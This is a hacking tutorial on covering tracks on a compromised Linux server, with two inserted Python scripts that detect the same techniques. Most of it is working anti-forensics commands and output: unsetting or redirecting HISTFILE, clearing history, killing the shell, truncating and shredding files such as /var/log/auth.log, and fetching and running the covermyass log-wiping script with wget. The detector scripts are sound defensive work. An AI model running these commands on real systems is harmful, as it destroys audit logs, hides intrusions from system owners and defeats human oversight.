Clear Logs and Bash History for Stealth

For an attacker, the final stage of exploitation is covering their tracks: wiping activity and logs so they can avoid being detected. It's especially crucial for persistence if the target will be accessed again in the future.

Step 1: Compromise a Target

The first thing we need to do is exploit the target. We can use command injection to abuse the way the server handles OS commands to get a shell. We'll also want to upgrade our new shell to a fully interactive one. Doing so will make it easier to work in general, and it will also let us use tab completion and terminal history.

After that, we can escalate our privileges to root so we can better take advantage of the system to remain undetected.

 

Step 2: Create an Easy-to-Delete Hidden Directory

Once we have root access, we can create a hidden directory to work out of and keep any scripts or files in. It won't fool anyone but the most inexperienced admin, but another layer of discretion certainly can't hurt. First, let's locate any writable directories with the following command:

root@kali:/# find / -perm -222 -type d 2>/dev/null
/dev/shm
/var/lock
/var/lib/php5
/var/tmp
/var/www/dav
/var/www/starwar/data/Sandbox
/var/www/starwar/data/Main
/var/www/starwar/data/Know
/var/www/starwar/data/starwar
/var/www/starwar/data/_default
/var/www/starwar/data/Trash
/var/www/starwar/public/Sandbox
/var/www/starwar/public/Main
/var/www/starwar/public/Know
/var/www/starwar/public/Know/IncorrectDllVersionW32PTH10DLL
/var/www/starwar/public/starwar
/var/www/starwar/public/starwar/starwarDocGraphics
/var/www/starwar/public/starwar/starwarTemplates
/var/www/starwar/public/starwar/starwarLogos
/var/www/starwar/public/starwar/PreviewBackground
/var/www/starwar/public/starwar/FileAttachment
/var/www/starwar/public/starwar/WabiSabi
/var/www/starwar/public/Trash
/var/www/starwar/public/icn
/tmp
/tmp/.ICE-unix
/tmp/.X11-unix

 

We can create a hidden directory with the mkdir command and by prepending the name with a dot:

root@kali:/# mkdir /dev/shm/.secretDir

 

If we list the contents of /dev/shm now, nothing shows up:

root@kali:/# ls -l /dev/shm/
total 0

 

Only when we use the -a switch to list all files and directories does it show up:

root@kali:/# ls -la /dev/shm/
total 0
drwxrwxrwt  3 root root    60 2019-06-19 13:49 .
drwxr-xr-x 13 root root 13480 2019-06-19 13:41 ..
drwxr-xr-x  2 root root    40 2019-06-19 13:49 .secretDir

 

To remove the directory once we are finished on the machine, use the rmdir command:

root@kali:/# rmdir /dev/shm/.secretDir/

 

Step 3: Delete the Bash History

Bash keeps a list of the commands used in the current session in memory and writes it to the history file when the session ends, so it's important to clear it to cover your tracks. We can view the current history with the history command:

root@kali:/# history
    1  cd /
    2  ls
    3  find / -perm -222 -type d 2>/dev/null
    4  cd /dev/shm/
    5  cd /
    6  mkdir /dev/shm/.secret
    7  ls -l /dev/shm/
    8  ls -la /dev/shm/
    9  ls
   10  rmdir /dev/shm/.secret/
   11  history

 

Commands are written to the file named by the HISTFILE environment variable, which is usually ~/.bash_history. We can echo it to see the location:

root@kali:/# echo $HISTFILE
/root/.bash_history

 

We can use the unset command to remove the variable:

root@kali:/# unset HISTFILE

 

So when we echo it again, nothing shows up:

root@kali:/# echo $HISTFILE

 

We can also make sure the command history isn't stored by sending it to /dev/null. Set the variable to it:

root@kali:/# HISTFILE=/dev/null

 

Or do the same with the export command:

root@kali:/# export HISTFILE=/dev/null

 

And the history will now be sent to /dev/null (nowhere):

root@kali:/# echo $HISTFILE
/dev/null

 

We can set the number of commands to be stored during the current session to 0 using the HISTSIZE variable:

root@kali:/# HISTSIZE=0

 

Alternatively, use the export command:

root@kali:/# export HISTSIZE=0

 

We can also change the number of lines allowed in the history file using the HISTFILESIZE variable. Set this to 0:

root@kali:/# HISTFILESIZE=0

 

Or with export:

root@kali:/# export HISTFILESIZE=0

 

The set command can be used to change shell options as well. To disable the history option, use the following command:

root@kali:/# set +o history

 

And to enable it again:

root@kali:/# set -o history

 

Similarly, the shopt command can be used to change shell options. To disable history, use the following command:

root@kali:/# shopt -ou history

 

And to enable it again:

root@kali:/# shopt -os history

 

While running commands on the target system, we can sometimes avoid saving them to history by starting the command with a leading space:

root@kali:~#  cat /etc/passwd

That technique only works when the shell's HISTCONTROL variable includes ignorespace or ignoreboth, so it depends on the system.

 

We can also just clear the history using the -c switch:

root@kali:~# history -c

 

To make sure the changes are written to disk, use the -w switch:

root@kali:~# history -w

 

That will only clear the history for the current session. To absolutely make sure the history is cleared when exiting a session, the following command comes in handy:

root@kali:/# cat /dev/null > ~/.bash_history && history -c && exit

 

We can also use the kill command to exit the session without saving history:

root@kali:/# kill -9 $$
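From the defender's side, the settings listed in this step are the things to look for. As an added example (not part of the original article), here is a small Python audit that flags the history-disabling settings in a shell startup file, in a live process environment, and in the state of a .bash_history path. The .bashrc fragment and the temporary files are constructed samples; the function names are hypothetical.

```python
import os
import re
import tempfile
# Constructed sample .bashrc fragment (not a real file); each regex below matches one technique
SAMPLE_RC = """\
HISTSIZE=0
export HISTFILESIZE=0
export HISTFILE=/dev/null   # history goes nowhere
set +o history
unset HISTFILE
"""

HISTORY_KILL_PATTERNS = {
    "HISTFILE sent to /dev/null": r"^\s*(export\s+)?HISTFILE=/dev/null\s*$",
    "HISTSIZE set to 0":          r"^\s*(export\s+)?HISTSIZE=0\s*$",
    "HISTFILESIZE set to 0":      r"^\s*(export\s+)?HISTFILESIZE=0\s*$",
    "HISTFILE unset":             r"^\s*unset\s+HISTFILE\s*$",
    "history option disabled":    r"^\s*(set\s+\+o|shopt\s+-ou)\s+history\s*$",
}

def audit_rc_text(text):
    """Return the history-disabling techniques found in shell startup-file text."""
    found = {}                                # dict keeps first-seen order, no duplicates
    for line in text.splitlines():
        code = line.split("#", 1)[0]          # drop trailing comments
        for label, pat in HISTORY_KILL_PATTERNS.items():
            if re.search(pat, code):
                found[label] = True
    return list(found)

def audit_env(env):
    """Flag the same settings in a live process environment (e.g. from /proc/<pid>/environ)."""
    bad = {"HISTFILE": "/dev/null", "HISTSIZE": "0", "HISTFILESIZE": "0"}
    return [f"{var}={val}" for var, val in bad.items() if env.get(var) == val]

def history_file_status(path):
    """Classify a ~/.bash_history path: 'devnull-link', 'missing', 'empty' or 'ok'."""
    if os.path.islink(path) and os.readlink(path) == "/dev/null":
        return "devnull-link"                 # history permanently redirected away
    if not os.path.exists(path):
        return "missing"                      # deleted, or never written
    return "empty" if os.path.getsize(path) == 0 else "ok"   # empty: cleared, e.g. cat /dev/null >

def demo_history_files():
    d = tempfile.mkdtemp()                    # constructed samples, not a real home directory
    with open(os.path.join(d, "ok"), "w") as fh:
        fh.write("ls -la /dev/shm/\n")        # a normal history entry
    open(os.path.join(d, "empty"), "w").close()
    os.symlink("/dev/null", os.path.join(d, "link"))
    return {n: history_file_status(os.path.join(d, n)) for n in ("ok", "empty", "link", "gone")}
```

A session killed with kill -9 $$ leaves no trace in the file at all, which is why an unexpectedly empty or missing .bash_history for an account that logged in is itself a signal worth alerting on.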

 

Step 4: Clear the Log Files

In addition to Bash history, log files also need to be wiped to remain undetected. Here are some common log files and what they contain:

  • /var/log/auth.log: authentication
  • /var/log/cron.log: cron jobs
  • /var/log/maillog: mail
  • /var/log/httpd: Apache

     

Of course, we can simply remove a log with the rm command:

root@kali:/# rm /var/log/auth.log

 

But that will likely raise red flags, so it's better to empty the file rather than erase it completely. We can use the truncate command to shrink the size to 0:

root@kali:/# truncate -s 0 /var/log/auth.log

Note that truncate is not present on every system.

 

We can accomplish the same thing by echoing an empty string into the file (this leaves a single newline in it):

root@kali:/# echo '' > /var/log/auth.log

 

And also with > by itself to empty the file:

root@kali:/# > /var/log/auth.log

 

We can also send it to /dev/null:

root@kali:/# cat /dev/null > /var/log/auth.log

 

Or use the tee command:

root@kali:/# true | tee /var/log/auth.log

 

We can also use the dd command to write nothing to the log file:

root@kali:/# dd if=/dev/null of=/var/log/auth.log
0+0 records in
0+0 records out
0 bytes (0 B) copied, 6.1494e-05 s, 0.0 kB/s

 

The shred command can be used to overwrite a file with random data so the original contents can't be recovered:

root@kali:/# shred /var/log/auth.log

 

We can even tack on -zu: -z adds a final pass that overwrites the file with zeros to hide the evidence of shredding, and -u truncates and removes the file afterwards:

root@kali:/# shred -zu /var/log/auth.log
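Each of the wiping commands in this step leaves a recognisable state behind: a missing file, a zero-byte file, a file holding a single newline, or a same-sized file full of NUL bytes. As an added example (not from the original article), here is a Python classifier that tells those outcomes apart; it builds constructed sample files in a temporary directory rather than touching real logs, and the function names are hypothetical.

```python
import os
import tempfile

def classify_log(path):
    """Classify a log file by the wiping signatures this step describes.
    Returns 'missing', 'truncated', 'newline-only', 'zero-filled' or 'ok'."""
    if not os.path.exists(path):
        return "missing"            # rm, or shred -u removed it
    if os.path.getsize(path) == 0:
        return "truncated"          # truncate -s 0, '>', cat /dev/null >, tee, dd
    with open(path, "rb") as fh:
        data = fh.read()            # samples are small; stream real logs in chunks
    if data == b"\n":
        return "newline-only"       # echo '' > file leaves exactly one newline byte
    if not data.strip(b"\0"):
        return "zero-filled"        # shred -z left a same-sized file of NUL bytes
    return "ok"

def build_samples():
    """Constructed files reproducing each outcome in a temp directory (not real logs)."""
    d = tempfile.mkdtemp()
    auth_line = b"Jun 19 13:49:01 host sshd[1234]: Accepted password for root from 192.0.2.10 port 5 ssh2\n"
    contents = {
        "ok.log": auth_line * 3,
        "truncated.log": b"",
        "newline.log": b"\n",
        "zeros.log": b"\0" * 4096,
    }
    paths = {}
    for name, data in contents.items():
        paths[name] = os.path.join(d, name)
        with open(paths[name], "wb") as fh:
            fh.write(data)
    paths["missing.log"] = os.path.join(d, "missing.log")   # never created
    return paths

def scan(paths):
    """Map each sample name to its classification."""
    return {name: classify_log(p) for name, p in paths.items()}
```

Every technique in this step rewrites the local file only, so the durable defence is shipping logs off-host as they are written (and, where the filesystem supports it, marking local logs append-only with chattr +a), which turns a wiped local file into a detectable gap rather than a lost record.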

 

Step 5: Use a Tool to Ensure Things Are Erased

To increase the chances that any activity on the target goes undiscovered, we can use a tool to make sure everything gets erased. Covermyass is a script that automates much of the process we've already covered, including clearing log files and disabling Bash history.

We can grab the script from GitHub using wget (assuming we have access to the internet on the target, otherwise, it will have to be transferred manually):

root@kali:/# wget https://raw.githubusercontent.com/sundowndev/covermyass/master/covermyass

 

Head to a writable directory, and use chmod to make it executable:

root@kali:/tmp# chmod +x covermyass

 

Then we can run it:

root@kali:/tmp# ./covermyass
Welcome to Cover my ass tool !
Select an option :
1) Clear logs for user root
2) Permenently disable auth & bash history
3) Restore settings to default
99) Exit tool
>

 

We're given a custom prompt with a few options to choose from. Let's select the first one to clear the logs:

> 1
[+] /var/log/messages cleaned.
[+] /var/log/auth.log cleaned.
[+] /var/log/kern.log cleaned.
[+] /var/log/wtmp cleaned.
[+] ~/.bash_history cleaned.
[+] History file deleted.
Reminder: your need to reload the session to see effects.
Type exit to do so.

 

We can also disable Bash and auth history with option 2:

> 2
[+] Permanently sending /var/log/auth.log to /dev/null
[+] Permanently sending bash_history to /dev/null
[+] Set HISTFILESIZE & HISTSIZE to 0
[+] Disabled history library
Permenently disabled bash log.

 

And in case you need to clear everything in a hurry, simply append now to the command:

root@kali:/tmp# ./covermyass now
[+] /var/log/messages cleaned.
[+] /var/log/kern.log cleaned.
[+] /var/log/wtmp cleaned.
[+] ~/.bash_history cleaned.
[+] History file deleted.
Reminder: your need to reload the session to see effects.
Type exit to do so.

 

In this guide, we explored various techniques used to cover tracks and remain undetected on a compromised machine. We covered ways to disable and delete Bash history, methods to clear log files, and used the Covermyass tool to make sure our activity on the target was wiped. There are other ways to clear certain traces of an attack, like using Metasploit, using shell scripting, or doing it on a hacked Windows machine, but the above should be everything you need for a basic Linux computer.

 

I hope you found this How to Clear Logs and Bash History article helpful! If you have any questions about this guide, please leave a comment below or reach out to me on Twitter @amrelsagaei
